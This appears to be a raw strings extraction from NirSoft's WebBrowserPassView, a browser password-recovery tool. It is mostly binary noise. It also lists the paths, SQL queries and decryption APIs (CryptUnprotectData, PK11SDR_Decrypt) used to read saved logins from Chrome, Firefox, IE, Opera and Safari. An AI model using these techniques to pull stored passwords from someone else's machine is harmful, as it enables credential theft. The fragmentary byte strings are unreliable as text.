J@3
9BL|
9BHv
u73
P(Y
P(Y
9p4
Ph8
Ph8
Ph8
2/B
O/B
s/B
 0B
/0B
_0B
E1B
v=B
P>B
*GB
;JB
_LB
rNB
+PB
wPB
"TB
8UB
yVB
NWB
|WB
k[B
E\B
]\B
z]B
?^B
y^B
5`B
aaB
*>B
:>B
B0B
;eB
NfB
7iB
^iB
&kB
6kB
0mB
cmB
SnB
PpB
 !""##$%&&&&'(()*+,--./0012345667789:;<======>????@@@@@A>BCDEFFGHIJKfLMNOPQRfSTUVWXYZf[f\]^_`afbcdffffffffffeU
L$$
D$ 
+L$
_^3
u h
YtJ
j(j
xCD
YYuMf
 uE
YYu1
YYu"f
_[^
VWt 
YYu
YYu
YYu
v(W
YYu
v,W
Wt`
tWVW
YYu
_^[]
QQS
9GtSj
f9|
j0VW
YY_^[
{(;G
H9E
89E
jt#
G;~
}Z3
t<9E
u79
@tf
YYj
X_^
j?Y3
QVWj
F(9X
j?Y
W,f
txW
SPQR
YYt
9G@u
X_^[
_^[
0SVW
K!3
YY|
_^[
;AP
YYt2
@Ph\
u7P
v ;
_^[
QQSVW
;HP~
YY3
_^[
SVW
YYt#
_^[
|$ u#QSV
\$(
D$$
D$@j
t$H
t$<
D$P
D$@
D$\
t$<
L$ 
D$0P
D$4r
D$8
t$<
L$@
D$ 
89D$
|$Q
D$P
D$D
t$<
!D$\9D$$
D$P
|$ 
t@hL
D$DSP
uNA
9\$$t
t$(
@_^[
G,P
O,)
QSV
um9Z(
t(=
t!=
R(k
IIQ
@IP
YYu
G@YY3
<c}
QQSV
IT3
9L$
Y@_Y
t%V3
90~
I,;
;0|
@,;
@,;
@,;
@,;
@,;E
QQSVW3
C0P
Yt{
_^]
SVW
Y_^[
:?Vuzj
@YYf
plh
;Al~
txf
YYf
Y_f
YY[^
j0X
t3S
t S
_^]
j0^
j0Y+
0f%
 u.f
YY3
0tO
Yt+
 u%
VVP
YY3
89E
_^[
YY3
G(P
G,P
^4f
[^_]
;AP~
YY_
tK9
^[]
HuR
YYt2
_^]
^t(
f9H
9P(u
GD3
GD3
9O@
_^[
<bt
F,j
IIQ
_HVW
f9B
QPS
LVW3
 u29
CHP
CHV
!y0
PQS
CD3
0t!3
YYt
AAQVj
PWj
j2S
j2S
j1S
_^[
QQf
VWt 
YYt*
u%9}
VPh0
_^[
ujVW
Q`3
t7F
AX_^
SWj
H`[
HTVj
H`^
;PT~
|);~
QSV
N`W3
t5G
_^[Y]
^9Q
H`^
;|$
NpZ
D$0
T$,
T$4
!T$
D$$
t@j
|$@
|$4
d$4
D$X
D$@
D$xY
D$lY
D$8
D$hL
Pjm
|$4
L$ 
t$ 
|$@V
D$0
D$ 
t$$
D$4
D$0R
t$<
t$0
T$\
|$d
t$P
t$\
t$P
D$\
t$ 
T$ 
J~J
|$0V
|$@V
D$0
t$<
t$,
|$@V
t$(
D$4
D$@j
T$D
t$ 
t$,V
T$(
T$0
|$0V
|$@V
D$0
t$4P
t$(
D$4
]t H
Pj^W
|$0V
D$(
L$D
K$k
D$0
t$,
|$0V
|$@V
D$0
t$<3
|$,F
D$4j
|$HV
t$HP
D$8jW
C$;
D$$
T$(
t$(
D$(
t$0W
t$ 
D$$u)W
t$$
D$(
D$(
~[H
WjJ
T$,
T$4
D$0_^[
t$(
L$(
d$ 
D$(
t$(
D$0
9\$(
 } 
D$$
;D$(|
D$$
t$ 3
PPPj
t$,
t$(
t$,
t$(j
t$,
T$D
L$0
|$(
|$(
L$ 
D$t
t$$
D$4V
D$ 
D$$j
t$8j
T$(
D$ j
T$$
WPV
WPj
HHt
HHu"
Ytpf
<^tU<btQ<
vI<
tE<
t8<
{HWVS
@_^[]
~>W
1t}Ht2H
D$(j
D$$S
T$8
P~F=
|$(S
D$$
t$03
|$8F
|$(S
D$$
t$0
t$8
t$(
D$(
T$(
_^[
1t[It2I
D$(j
D$(S
T$<
P~E
|$$S
D$$
t$03
|$$S
D$$
t$0
t$<
t$,
D$(
=9U
D$$S
T$(
_^[
uo2
YYuR
YYuA
u&f
f;F
t'j
_^[
QQV3
uL3
u>;
YYu
s$9
YYt
C j
{(Y
f;Q
_$3
@_^[
YY3
t)S
H`9Q
Q8;
<0+
Q8_
;x8~
p<^
taW
^1A
_^[
QPh
^1A
^1A
_^[
_^]
9{@tTV
tG9~
QQW
Pjg
3PP
t5j
PVV
PVVj
^[_
 SV
WhL
6hh
YYt6
sHW
WVWj^
WWVh
t%P
PPPPPV
_^[
QQVW
t|S
SjP
[_^
YYt
8bu
p9{
9{$t
29}
Pjbj
<;t
@@P
^[_
3h<
G,j
Y_[
YYu&
Sj`
^_[
Vj^W
;JH~
JHj
j&W
Vj^W
89u
PVj
PVj
jKW
 9u
Vj^W
SjV
@ ;
9XH}
XH9u
^_[
SVW
GDj
_^[t
s@W
GHVS@W
_^t
QSV
u%3
YF;s
uIS
WVW
WVj
_^[
8VQ
9 u
_^3
SVW
YYu
CSh
YYu
YYu
_^[
SVW
u%W@
_^[
SVW
u,j0
@I:AIt
G4t
YY_^[
E|SW
Ehu
]d~)V
Ed;G
uhh
uhh
uhh(
Y_[
,SV
Wj$
Pjz
_^[
YYu;
YYu,
89E
_^[
?h@
SVW
Yu:
YYu+
YYu
YYu
_^[
 u?f
YYu
YYu
YYu/
YYu
SVW
9_@
8^|u
YPSSSj|
9_@ub8^
u]9
9_Du
_^[
uiV
jhj
~PV
SVW
YYu?9E
_^[]
~JS
YYtE
H ;
9p u
_9{
~Rj X
j PV
tT9_
YY^[]
F f
v(S
Y9~8t$9~4~
G;~4YY|
v8S
YYVS
YY[_^]
t>SW
G@Y
YY3
YYt
YYt
H@f
j|W
CH@
VPj
@IVPj
@Vj
PAQPj
Sj6
SVSj
VSj7
j+W
<_^[
A;OP~
u'SW
Sh8
[_^
ct\
rahct
bolct
txetu
bolbu
<ct
<eu
tni
6hT
YY_
|<;~
*9]
u%S
SSS
Y_^[
Yt-
9:u
YY_[^
QQSVW
YY_^[
@SPj
t$ 
;"u
"FC8
0^[
W~)
GG@
BB@
D0#P3
dBD
VVVj+
VVj
,9s@u0
Q@PRh 
YYPj
W@W
F,^_[
4SV
YYt
VVVj+
Q@PRh 
YYPj
P@P
YY_^[
CDS
KD3
v@f
t:V
t$W
YYu
YYV
6WW
6WW
Y^[
SVW
%t"
|0$
N(3
YYu
s$3
_^[
Vj`
Q@@P
j3S
(_^[
YYt
8G|u
YYt
YYtN
@ A
7h<
@PQ
YYtF
<ct
9E t+9E
BRQh
YYj
YYP3
VVVjz
B9P
NB;P
YYu
PVh
Ph 
3PP
Y_[
YtN
_^[
t39~
G;~
YY|
SVW
_^[
W~5
Yj8
H;E
0+E
8Hu
SQj
^[]
~8VW
89E
_^[]
~tV
w0V
89E
YY_
SVW
uH9E
u<9E
_^[]
YYt
F0^
QSVW
t19~
~,3
Wj"
G;~
PPPj!
_^[
j P
YY_^
QQSVW
u\8
uTh
PVS
N$Sj
YYu
_^[
tIj
jjj
|.3
tbSV
^[_
~3SW
_[^
QQS
@Ij
YYt
EVS
Y_^[
YtM
YY3
@^[
uI9
WPV
_[]
Yue9D$
G=P
YtM
F<W
YY3
uA9A
t73
8L$
0_[
C%P
YtJf
G$f
_^[
6YY;
{D_^[
jP3
8XHu4
F W
2hx
t]VS
SS3
YYSSSSSS
SVj
9^@
SSjj
CHj
ug9}
WWV
u>j
{HGj
Wji
Wj+
QQV
(9K
A;K
u WSj
WSV
u?j
_^[
t!j
AQP
VjG
[ F
X8V
t`3
A9M
t?P
@;E
_^[
Ht%Ht
HVWt4
YY_^
SVW
D$ 
T$$u"
9D$$
9D$ s%
9T$$
9T$ 
D$ 
T$$
|$$
|$ 
L$ 
t$$
d$ 
d$$
9T$
t&)L$ 
t$$9T$$
9T$ s
L$ 
T$ 
t$$
T$$
|$ 
t$$;
+D$ 
T$$
!L$
T$ 
YYu
_^[
9T$$|
9T$ v
D$ 
D$$
T$ 
T$$t C<
D$ 
T$$
9D$
_^Y
QSV
YYt?GWSV
Y_^[
QSV
YYt6GWSV
Y_^[
QQj
SVW
YYt'V
YYu
_^[
^Yu
]tT
]t'
N9u
_^[
SVW
tH;
7YY
;Ch~
YtR
_^[
^8W
_^[
8@D
QSVW
A@@;
YYtQ3
>'u
'AF
Y_^[
QSVW
Y_^[
_^[
|$(
D$ 
D$4P
T$<
+D$
D$0X
D$(
+D$
D$0
T$4
|$0
L$4
\$4
t$$P
|$0
D$(
@;D$,
+|$
Y_^[
SVW
C9]
 DD
D$$tJ
;D$
D$ 
D$ 
)D$
D$$
~L3
;D$
D$$
+D$$
Y_^[
Wj 
#D$
_^[
YtA9X
v58X
!8X
YY^[
Yt'
YY^
Y^t
YY^
tNV
Wj(
Yt9f
_^[]
Y^[
Ytp
YY_^[
Yt3
Y_^
SVW
PWVj
_^[
VUj
t$$VUj
SUj
|$T
@_^][Y
SVW
_^[
SVW
GDH
9u$
Pjo
PjI
F;w
M P
u jL
,HH
PjK
j2S
u 9
-9u$~
u$Pjn
YY_^[
8VW
9u 
VVP
YYtK
jL3
uj9u ~eh
@ f
jK3
u P
YY_^t
r@Q
t?V
$_^]
QQW
@$;
@S@PSjo
^[_
YY3
@;F
YY3
YYtq
YY3
_^[
C$VW
PVS
QQVW
9F$
[_^
Pjv3
PjL3
09E
tzPj
Pjv3
Pjv3
PjF3
u09E
Pjv3
jb3
j8S
YYt
PPPPPP
YYP
~$Q
_^[
^ W
_[^
Wu.
t$ 
SVuZ
@@P3
0@;G
SVuA
@P3
G(j
QSW
8&u!
G;{
9_@
El9X
EhSji
9}tu
M4P
9}tY
CH3
E<Wj
PGG
PPPj
utS
9C@
E@u
E\Vj)
E\j
E\j
E\Vj6
uPVj7
u j
`j$
}@9}@
}X~.
;E@|
MTNu
+ET;
QPV
9M@t
@;F
ET;G
EX;F
ulh
E8f
CHj
E\j
EhS
u\jA
E\j
E\j
u(t
ET}
E\j
u0j
Mpk
E\jJ
E\j
E\j
ET@
Ux3
1;uXt
9M,u
9Mpt
^9M,t
uHP
E\j
Mpk
{HWP
EH;G
ET@P
E\j
u|+G
HPWj
E\j
u<j
9ED
9E,t
E\V
u0j
k9Ett
E\j
Mpk
E\u+VjJ
E\j6
AAQVjI
E\Vj
E\j
u$j6
uT~b
E !uH
EX;w
uXj
UH8L
EX;w
u<@@Pj
+ET
91t
9U@
9U,t
uXP
u0j
9Utt
E\j
Mpk
E(P
uP3
u|3
9uDV
u$WS
u<VWS
9u(
u$S
E8f
E\j
u|+G
HHPWj
u0jC
YYt
E$@
YYu
E8f
u*3
]lV
}pV
utV
_^[
9u u
}$ct
HtNHtCHtHH
t*WjJ
u(WjI
WRj
G;E
}$c
{#t
_9u t
VVjj
VVS
u(Vj
9u t
}$ct
Pj3
u(j
G;{
VVjj
_^[t
QQW
@ A
t$P
PjF
t3VW
Qj'
9GD^}
$SV
h5J
YWW
YY3
9L$
T$(RQj
t$ 
L$4
L$ 
D$(
\$ 
|$,
dt"
9\$ 
9\$ uD
D$ 
duK;
D$$~<
L$$
|$,C;
t$(W
D$(
\$ 
Y_^[
QQSV3
C9=0
tsj
;=0
Yt,hHDD
_^[
<SV
(GD
 GD
@^[
0GD
QQSVW
GHj
<_^[
QSVW
8GD
_^[
PPP
t!Ht
$SVW
@$;
xHSS
@Sh
Sj^V
Sj^V
XSW
Sj^V
Sj^V
TSh
Sj^V
8@D
SPSVSj^
SVVj
XSSP
RPV
_^[
WuN
QSV
YYt"
YY3
_^[
YYt
u4j
Ph8
tU9}
u&$
AIh`
II;
t+hh
9xLu+
YYu
_^[
!D$
_^[
8A|u
0W3
u%WS
YYt
_^[
91t
SVW
|}t
tq;wL~"h
Yt&
PWS
YYu
_^[
hfW
Y_Y]
QSVW
_^[
v(S
v,S
_^[
8jP
jPP
jqW3
9E 
YYt
YY3
YY]
(HD
$DD
=HD
*HD
 tG$
_^[
_^[
VW3
9|$
8;|$
QQSVW
jL3
YY_
t!W
YYu
t|9
t89N
tz9O
Q@SP
8H9E
_^[
WVj
Wjs
_^[
t:j
t$$
j2V
FH@
t-WR
SRWj
SRWj
5RWj
u P
_^[
Yth
$SV
W@P
C;]
_^[
tVW
8;u
t;;
9Z@
_^t
QQQP
;>|
uL9]
h^1A
Y_^[
h^1A
8vt
;Wh
@;E
KYu
_^[
,SV
PPP
_^[
_^[
FHW
YYtE
KH;
Wjs
Wjq
_^[
WuV
t19
_^[]
t09
~,W3
t19
t19
t19
_^[]
P(;
9{(u
9x,u
9{$t
f99t
t(3
99~"
f99
C(W
{$u
H f
Yj8j
YY3
@_^[
VuW
uMf
VWtE
s43
SVW
T$ 
RQf
\$L
|$T
D$8
D$4Y
D$0
D$8
D$ 
89D$
\$D
!D$
8qt
9T$
9T$
D$4
d$4
t$0
<qtM<vu
9qtA
T$Pu
D$$
T$$
D$ f9
t$T
t$,
|$8
D$(u
D$(
L$$;
T$(
D$P
T$@
T$<
L$<
\$L
9D$
~F9D$$u@
t(P
D$$S
|$D
t$8
\$L
d$T
|$<
\$Hu
D$ f
L$(j
Pjv3
|$4
t$,h
D$H
D$L
L$H
L$X
D$d
D$$
L$`
t$T
|$H
t$<
D$@
D$@
D$<
D$ 
89D$
t$,
9T$Pu&9T$$
t$$h
t$0
D$D
t$0
;AP~
@_^[
 uY
~;W
89E
_^[3
udW
Y,A
YYu>
YYu"
YY_^[
VW3
F;s
9{$
u P
PWW
;C$|
9_$V
;_$|
@,j
PQQQj
;H$
_^[
]tV
ux3
9ML
MLk
uLP
Md)
]8u
}tt2SW
ODj
@@P
Ehj)
Yt5
] W
Sj)
]Xu}
u}S
ETP
u0W
G,;FL
;NHs
Ehj
u8V
9VL|
jdX
9FHv
YYt
@VS
CH@
EhVj
EhV
u4Vj
udj
EXP
u0S
!u@
E<~
E<@
EXj
Ehj5
Ehj
EhW
u<Vj
EhW
EX3
90~H
EHt
EhV
F;0|
}hj
@Pj
udj
$9]@t
M(j
u$j
E(j
ExS
E,@
EdV
u,j
Ect<
E4t
utV
EcP
EdP
u0V
9]dYYu
8]ct
EhS
uDj
E|W
uhV
_^[
tHSVW
_^[]
;K@Wt?
t8V
;C@u
C<_
$SVW3
9] 
8Y|u
@@;B
M hd
YYt
9]$
G@Y
0t'
0u#S
_^[
Phd
YYt
YYPj
YYt
P<Y
H<^
YY_[
(VP
Yt"S
VWjiS
t*j
_^[
SVWjk
YYt&j
^[]
Vjj
YYt
t8V
@9G
Y_^[
QQV
VVVj+
3VV
X9GH}
GH_^
YYt;
9\$
VWt,;
@_^[
SVW
;D$
QVW
IttIt;j
PSW
YYP
YPj
YYP
>tt
<SVW
tKj
PWS
YYu
_^[
QSVW
_^[
SV3
_^[]
QQk
RIR
SV3
9s@
@;G
j$P
@ A
u&9G
Yt$
CH9u
SH9u
KHt
t!9
CHVP
~(WS
Pj'
t%jJ
YY3
t$3
G;~
G;~
ku*
VWS
}2;~
G;~
(9}
WVS
WWj
ku2
@ ;
09}
t;9
 _^[
,SV
t P
PPPPPP
Sj)
SjA
 9G
@Pj
PSjC
Sj+
D_^[
QSV
YY^
SVW
@PPj
_^[]
VWj
dYt
_^[
SWu
x +x$
H j
N$PW
Yu|3
dHD
eHD
dHD
YYuCCC
u)S
;L$
YVW
YY_
J03
!B0
t/SVW
1;t$
_^[
uA!E
YY|
^8[
toS
[_^
t$S
_[^
WWWjz
PWj
@PSWW
YYt
_^[
G4h8
tF9M
7hL
t4< t03
~tj
< t
F;u
F;u
}F3
2;M
YY^[
QQSVW
t~S
Yuq
_^[
QQS
u"S
YYt-9_0t(V
YYu
!G0
tU9
~1V
YY[
t+V
QSV
t)!E
_^[
QQS3
@(;
VWR
>9_H
Yt8
WHS
@PQR
_^[
;9t@B
Y[t
QSVW
_^[t
SV|h
(QSP
Yj(3
YY_^[
0;t$
OSW
[^]
QQS3
t&9
~"W3
SVW3
<M_
,M4
YtJ
G91u
_^[
SVW
YYt
_^[
(VW
HYY
u"f
F P
<@u
WPj
PjP3
PjO3
uoPV
j23
_^[
})k
$SV
t,;_
C;E
VW3
9T$
X|!~
9T$
9D$
#D$
#T$
SW3
YYu
F$_[
CHV
sHW
YYt;
YYtx
(9}
~53
G;}
j?Y9J
A;J
v j(W
v jF
_^[
(Iu
(;V
_^[
QVW
Qh8
Y~3
F;3|
G@_^
j(j
Y9}
t(9{ u#QP
9{ t
SVW
}hj(
Sj4
EHd
ulP
M8k
E0C;_
ulS
uDj
ulS
EHj$
ulS
EH!
MdS
E83
ELt.
:Qj
E4j
RPWQ
}LQ
jdRP
jdRP
U@t"RP
U@3
9}Dt
U@9}P
E@;F
E<;F
#Et
#Mx;E
uG;M
UPK
ETt
}@;
9U<r
9U<wA
MP;N
ML;N
M<#E
_^[
SVW
?bu
~(V
VWS
_^[]
SjA
9~@u
FDtC
Sj=
~@[
KHW
<bu
bG;}
TSVW
O4k
G,v$
FHj
F9u
|X3
@;E
NVj
HHP
VSj
<Ot
<Mt
G<u
t Sj$
@(3
WjI
<bu
'9U
AlHD
VjI
<bu
G<u
tHD
t PV
YYu9
xHD
|HD
K$#E
O0j
O$#E
(;C
_^[
~\VW
P;C
f=@
j@h
YY3
u`k
YYjE
utV
utj
utW
ML3
89EL|
9M`
j(3
E`3
H9EH
u$;
9u8
8;E`
E4;EHt
#EP
#MT
E4;EH
9UXt
ET9UL
Ex;
9V4u
9uX
#EP#MT
us9u8|
#} 
#M$
tZ9u
E<9p4t
tH9u8|0
E4j
E83
9u(u
E<8;E`
U\!E@
Mpk
!EP
!UT
A4|0
E\P;E`
Upk
EXj
YPj
[^_
uX3
@}*
O,3
RHQ
uPW
p j&
E\P
!EP
!UT
M(Y
9}`
s\RP
P;}`
D0 
t8l
3jC
tuP
 u>
}`+
P;G
Y^[
9bu
Sw]
Y_^
Y[^
dW|&
SVW
VVVj+
Q@PRh 
YYPj
V@V
YYt
U(^D
Sj^
PPPP
PPPP
PPP
jq3
Pjv3
WWWWWWW
jv3
jv3
jv3
Ph<
j%3
;A`~
PhT
SjJ
WSjF
WSh
jG3
jt3
jH3
Y9{
jH3
t,WWWWWWW
YYP
QQQjx
YY3
j83
j83
hTCD
_^[
 !"#
$%%&'
()*
./01
+2+34+567
89:+;
?@A
BCDE
FGH%
JKL+
+NO+
+%PQRS
+TUVWXY4Z[\
>]^_`abbcdaaefghijkllllllllmnmnopqrstuuvw
yz{|}~
|^=
phD
dtJ
HtiHt^HtSHtHHt=H
-u"
/ta~
*u-
t&j
<tHHt0H
SVW
CL3
Ht--
tkHu.
tIh
et 
PVS
YY9
HDPS
YY9
_^[
SU3
VWt
u19
j\Sh
u 9
YuEj
_^][
QS3
YYj
hdBD
YYj
_^[
_[]
u19E
YY9
SVW
Yt!h
uaB
~,!]
C;_
.h(
YVW
6YY
YSW
6YY
YYt
G80y5
G83-<
_^[
SV3
Y_^[
WQV
u"9
YYj
Y^[
;D$
9D$
YY3
SVWj
WCh
_^[
QS3
VQP
tw9q
tr9
YYj
Y^[
SUV3
GDu
GHh@nD
USj
USj
USj
@8_
SVj
G,j
D$ 
t$8
XSP
uQSS
u-SS
_^][Y
9^$W
SPf
SPf
Yu'
D1D
F$u@j
p1D
F$u
F 3
@_[
t"W
QPh
YYh
u'h
YY|
UWh
YYu
_]^[
|=D
Pj#X
t'<
_^[
SVW
YtVj
VWS
_^[
Wv(j
unSWh<
F [
~ _
@SVW
QShl=D
Ht'
F ;
QWW
u%9}
_^[
%`3D
% 4D
%|3D
%x3D
%t3D
%p3D
%l3D
%,4D
%(4D
jph
8MZu
9PE
d3D
\3D
X3D
T3D
hY,A
hh4D
hd4D
h`4D
hD4D
>"uE
f="
>"u
f= 
> v
XPVWW
%$4D
SVW
Y_^[
%h3D
%,3D
%$3D
%(3D
SW3
OyN
;T$
;D$
+D$
+D$
WVS3
;T$
;D$
[^_
;T$
;D$
+D$
+D$
;T$
;D$
N+D$
+D$
WVU3
;T$
;D$
N+D$
+D$
]^_
h9-D
hJ-D
h[-D
hz-D
!-D
--D
D%2.2X
MS Sans Serif
WebBrowserPassView
%%0.%df
Lh@
Apple Computer\Preferences\keychain.plist
server
Path
Account
Data
com.apple.Safari
com.apple.WebKit2WebProcess
chp
SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins 
ShowGridLines
SaveFilterIndex
ShowInfoTip
MarkOddEvenRows
LoadPasswordsIE
LoadPasswordsFirefox
LoadPasswordsChrome
LoadPasswordsOpera
LoadPasswordsSafari
LoadPasswordsSeaMonkey
UseFirefoxProfileFolder
UseFirefoxInstallFolder
UseChromeProfileFolder
UseOperaPasswordFile
FirefoxProfileFolder
FirefoxInstallFolder
ChromeProfileFolder
OperaPasswordFile
"Account","Login Name","Password","Web Site","Comments"
<meta http-equiv='content-type' content='text/html;charset=%s'>
<table dir="rtl"><tr><td>
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>
</table>
J/@
`,A
Y,A
J5@
u7@
z6@
u7@
u7@
&I@
F0@
G7@
u7@
Aadvapi32.dll
CredReadA
CredFree
CredDeleteA
CredEnumerateA
CredEnumerateW
crypt32.dll
CryptUnprotectData
CryptAcquireContextA
CryptReleaseContext
CryptCreateHash
CryptGetHashParam
CryptHashData
CryptDestroyHash
*.*
comctl32.dll
InitCommonControlsEx
Error
Error: Cannot load the common control classes.
JpM
3.7.5
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
******""""""""""""""""""""
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@l
LLLLLLLLLL
-+A
k+A
z+A
Y,A
`,A
Y,A
Y,A
\,A
`,A
`,A
Y,A
`,A
a,A
!-A
0-A
;-A
?-A
0123456789ABCDEF0123456789abcdef
-x0
                             
thstndrd
vOA
zRA
(RA
_SA
gSA
bVA
*kA
5lA
@nA
;oA
SQLite format 3
fwB
Y,A
*?[
0123456789ABCDEF
naturaleftouterightfullinnercross
onoffalseyestruefull
CREATE TABLE sqlite_master(
  type text,
  name text,
  tbl_name text,
  rootpage integer,
  sql text
A?/,.-
22d9
777705555443332
7777
5555443332
89/
667777
5555443332
 5555443332
^89/
667777
5555443332
3332
89/
667777
5555443332
443332
89/
667777
5555443332
89/
667777
5555443332
89/
667777
5555443332
89/
667777
5555443332
"89/
667777
5555443332
89/
667777
5555443332
89/
667777
5555443332
89/
667777
5555443332
89/
667777
5555443332
8-/
667777
5555443332
667777
5555443332
667777
5555443332
$()
utsrp
MNOPQRSTUVWXYZ[\
12MNOPmRSTUVWXYZ[\
DEFGHIJKLMNOP
RSTUVWXYZ[\
RSTUVWXYZ[\
^_`
cdeL
12ijk6n
DEFGHIJKLMNOPvRSTUVWXYZ[\
\ab
`abcdef
<\>m
abcdefVW12vtm
^_ aXYZ[\
h)jDEFGHIJKLMNOP
RSTUVWXYZ[\
VWXYZ[\
Bcdep
DEFGHIJKLMNOP~RSTUVWXYZ[\
ijk
q12
cde
nDEFGHIJKLMNOPvRSTUVWXYZ[\
^_t
^_^<
X129x
^_x3
:DEFGHIJKLMNOP
RSTUVWXYZ[\
ijk
rsl
,,..
rs2
DEFGHIJKLMNOPwRSTUVWXYZ[\
_ijk
m12x
DEFGHIJKLMNOP
RSTUVWXYZ[\
q12
xdC
DEFGHIJKLMNOP
RSTUVWXYZ[\
"v_
212
DEFGHIJKLMNOP
RSTUVWXYZ[\
DEFGHIJKLMNOP
RSTUVWXYZ[\
DEFGHIJKLMNOP
RSTUVWXYZ[\
DEFGHIJKLMNOP
RSTUVWXYZ[\
GHEFGHIJKLMNOP
RSTUVWXYZ[\
12v
FGHIJKLMNOP
RSTUVWXYZ[\
VWXB
]^_
]^_
~8|{
]^_
]^_
ijk
]YS
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
HerF
qQ2l
0Vb
yf8x5
[X]Ti
Uk 
uLm:.P
(p$
R;<
^gSG
%EO
!$).056;>ACENQV[_`eimuz
)Q+e4"n-.1
s<f`
65l
!|{k
3b1$ j
xi2
9Eag
H%&
'_BBc
uFo,w_1#
Iz:__
;py=>/q
!5Ng
  ##%%&&))**,,//1122447788;;==>>@@CCEEFFIIJJLLOOQQRRTTWWXX[[]]^^aabbddgghhkkmmnnppssuuvvyyzz||
@  
@  
@  
@  
@  
 @ 
@  
@  
@  
dat
wand.dat
ZG@
&I@
`,A
<M@
Lh@
@nss3.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe
%programfiles%\Sea Monkey
SOFTWARE\Mozilla
mozilla
%s\bin
PathToExe
%programfiles%\Mozilla Firefox
SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
---
-signons.txt
signons2.txt
signons3.txt
signons.sqlite
netmsg.dll
Unknown Error
Error %d: %s
edit
kernel32.dll
open
%2.2X 
%s (%s)
Microsoft_WinInet
Microsoft_WinInet_
u7@
@dllhost.exe
taskhost.exe
taskhostex.exe
bhv
Containers
ContainerId
Name
History
Container_%I64d
AccessCount
CreationTime
ExpiryTime
AccessedTime
ModifiedTime
Url
EntryID
visited:
Microsoft\Windows\WebCache\WebCacheV01.dat
Microsoft\Windows\WebCache\WebCacheV24.dat
0123456789ABCDEF
URL 
index.dat
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
https://www.google.com/accounts/servicelogin
http://www.facebook.com/
https://login.yahoo.com/config/login
@internet explorer
http://
https://
:stringdata
wininetcachecredentials
ftp://
dpapi:
caption
menu_%d
dialog_%d
strings
general
sysdatetimepick32
rtl
charset
TranslatorName
TranslatorURL
Version
RTL
_lng.ini
%-18s: %s
%%-%d.%ds 
<td bgcolor=#%s nowrap>%s
<td bgcolor=#%s>%s
<tr>
&nbsp;
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
 bgcolor="%s"
<table border="1" cellpadding="5">
 nowrap
<font color="%s">%s</font>
</table><p>
<item>
<%s>%s</%s>
</item>
<?xml version="1.0" ?>
<%s>
</%s>
Y,A
u7@
Y,A
u7@
`,A
&I@
@/sort
/nosort
SysListView32
/nosaveload
report.html
commdlg_FindReplace
txt
*.txt
*.csv
*.htm;*.html
*.xml
.cfg
General
WinPos
Sort
Columns
Arial
/stext
/shtml
/sverhtml
/sxml
/stab
/stabular
/scomma
/skeepass
/savelangfile
/deleteregkey
Lh@
`,A
Lh@
Lh@
@history.dat
places.sqlite
Mozilla\Profiles
Mozilla\Firefox\Profiles
Mozilla\SeaMonkey\Profiles
Mozilla\SeaMonkey
Mozilla\Firefox
profiles.ini
Profile%d
IsRelative
{Unknown}
Exception %8.8X at addres
s %8.8X in module %s
Registers: 
EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X
ESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X
EIP=%8.8X
Stack Data: %s
Code Data: %s
sqlite3.dll
mozsqlite3.dll
NSS_Init
NSS_Shutdown
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_CheckUserPassword
PK11_Authenticate
PK11SDR_Decrypt
ntdll.dll
NtQuerySystemInformation
NtLoadDriver
NtUnloadDriver
NtOpenSymbolicLinkObject
NtQuerySymbolicLinkObject
NtQueryObject
NtSuspendProcess
NtResumeProcess
Web Data
Login Data
Google\Chrome\User Data
Google\Chrome SxS\User Data
Opera\Opera\wand.dat
Opera\Opera7\profile\wand.dat
Opera
Lh@
Lh@
Lh@
`,A
`,A
:'@
\'@
Lh@
Lh@
`,A
`,A
:'@
\'@
CreateToolhelp32Snapshot
Module32First
Module32Next
Process32First
Process32Next
psapi.dll
GetModuleBaseNameW
EnumProcessModules
GetModuleFileNameExW
EnumProcesses
GetModuleInformation
\systemroot
QueryFullProcessImageNameW
GetProcessTimes
STATIC
EDIT
%s:
pstorec.dll
PStoreCreateInstance
@"%s"
Ashell32.dll
SHGetSpecialFolderPathW
AppData
Favorites
Desktop
Start Menu
Programs
Startup
Common Start Menu
Common Programs
Common Desktop
Common Startup
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SHAutoComplete
%2.2X%2.2X%2.2X
&lt;
&gt;
&quot;
&deg;
&amp;
<br>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>%s<title>%s</title></head>
<body>
%s <h3>%s</h3>
</body></html>
<font
 size="%d"
 color="#%s"
<b>
</b>
</font>
<font color="%s">
<table border="1" cellpadding="5"><tr%s>
 width="%s"
<th%s>%s%s%s
</table>
file is encrypted or is not a database
bind or column index out of range
auxiliary database format error
authorization denied
large file support is disabled
library routine called out of sequence
datatype mismatch
constraint failed
table contains no data
locking protocol
unable to open database file
database or disk is full
unknown operation
database disk image is malformed
disk I/O error
